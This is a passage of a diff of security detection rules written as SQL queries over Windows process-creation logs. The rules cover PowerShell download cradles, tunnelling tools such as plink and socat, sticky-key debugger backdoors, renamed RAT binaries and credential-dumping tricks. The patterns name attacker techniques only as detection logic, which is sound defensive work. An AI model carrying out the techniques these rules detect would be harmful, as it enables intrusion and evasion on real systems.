- "Legitimate admin scripts" + "Other legitimate \"Windows Terminal\" profiles" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') 
AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT 
((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" + "filename": "proc_creation_win_windows_terminal_susp_children.yml" }, { - "title": "Potential Commandline Obfuscation Using Escape Characters", - "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", + "title": "Suspicious PowerShell Invocation From Script Engines", + "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", "status": "test", - "description": "Detects potential commandline obfuscation using known escape characters", - "author": "juju4", + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Microsoft Operations Manager (MOM)", + "Other scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_susp_cli_obfuscation_escape_char.yml" + "filename": "proc_creation_win_powershell_script_engine_parent.yml" }, { - "title": "Use Short Name Path in Image", - "id": "a96970af-f126-420d-90e1-d37bf25e50e1", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", - "author": "frack113, Nasreddine Bencherchali", + "title": "New Service Creation Using PowerShell", + "id": "c02e96b7-c63a-4c47-bd83-4a9f74afcfb2", + "status": "test", + "description": "Detects the creation of a new service using powershell.", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + "Legitimate administrator or user creates a service for legitimate reasons.", + "Software installation" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%~2\\\\%' ESCAPE '\\') AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR Product = 'InstallShield (R)' OR Description = 'InstallShield (R) Setup Engine' OR Company = 'InstallShield Software Corporation') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR (NewProcessName LIKE '%~1\\\\unzip.exe' ESCAPE '\\' OR NewProcessName LIKE '%~1\\\\7zG.exe' ESCAPE '\\'))))" + "SELECT * FROM 
logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_ntfs_short_name_path_use_image.yml" + "filename": "proc_creation_win_powershell_create_service.yml" }, { - "title": "Potential Remote Desktop Tunneling", - "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", + "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", + "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", "status": "experimental", - "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", - "author": "Tim Rauch", + "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). 
The adversary may then perform actions as the logged-on user.\n", + "author": "frack113", "tags": [ "attack.lateral_movement", - "attack.t1021" + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "WSL (Windows Sub System For Linux)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" - }, - { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_mstsc_remote_connection.yml" }, { - "title": "Suspicious Msiexec Quiet Install From Remote Location", - "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", "status": 
"experimental", - "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], - "level": "medium", - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_install_remote.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "MsiExec Web Install", - "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", "status": "test", - "description": "Detects suspicious msiexec process starts with web addresses as parameter", - "author": "Florian Roth (Nextron Systems)", + 
"description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.007", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Winzip", + "Other self-extractors" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_web_install.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "AgentExecutor PowerShell Execution", + "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. 
Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_lolbin_agentexecutor.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", - "status": "test", - "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "title": "Application Removed Via Wmic.EXE", + "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + 
"status": "experimental", + "description": "Uninstall an application with wmic", + "author": "frac113", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_wmic_uninstall_application.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", + "title": "Detect Virtualbox Driver Installation OR Starting Of VMs", + "id": "bab049ca-7471-4828-9024-38279a4c04da", "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. 
This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", + "author": "Janantha Marasinghe", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1564.006", + "attack.t1564" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "This may have false positives on hosts where Virtualbox is legitimately being used for operations" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%VBoxRT.dll,RTR3Init%' ESCAPE '\\' OR CommandLine LIKE '%VBoxC.dll%' ESCAPE '\\' OR CommandLine LIKE '%VBoxDrv.sys%' ESCAPE '\\') OR (CommandLine LIKE '%startvm%' ESCAPE '\\' OR CommandLine LIKE '%controlvm%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_virtualbox_execution.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_servu_susp_child_process.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Exploit for CVE-2017-8759", - "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "title": "Exfiltration and Tunneling Tools Execution", + "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Execution of well known tools for data exfiltration and tunneling", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1041", + "attack.t1572", + "attack.t1071.001" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tools" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\socat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\httptunnel.exe' ESCAPE 
'\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" }, { - "title": "Suspicious Runscripthelper.exe", - "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", "status": "test", - "description": "Detects execution of powershell scripts via Runscripthelper.exe", - "author": "Victor Sergeev, oscd.community", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_runscripthelper.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "title": "Proxy Execution Via Explorer.exe", + "id": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - 
"author": "Markus Neis, Nasreddine Bencherchali", + "description": "Attackers can use explorer.exe for evading defense mechanisms", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate explorer.exe run from cmd.exe" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%explorer.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_explorer_lolbin_execution.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Detects the usage and installation of a 
backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' 